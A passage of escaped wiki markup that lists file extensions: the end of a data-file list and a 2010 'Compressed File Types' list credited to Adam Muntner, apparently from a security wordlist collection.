.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
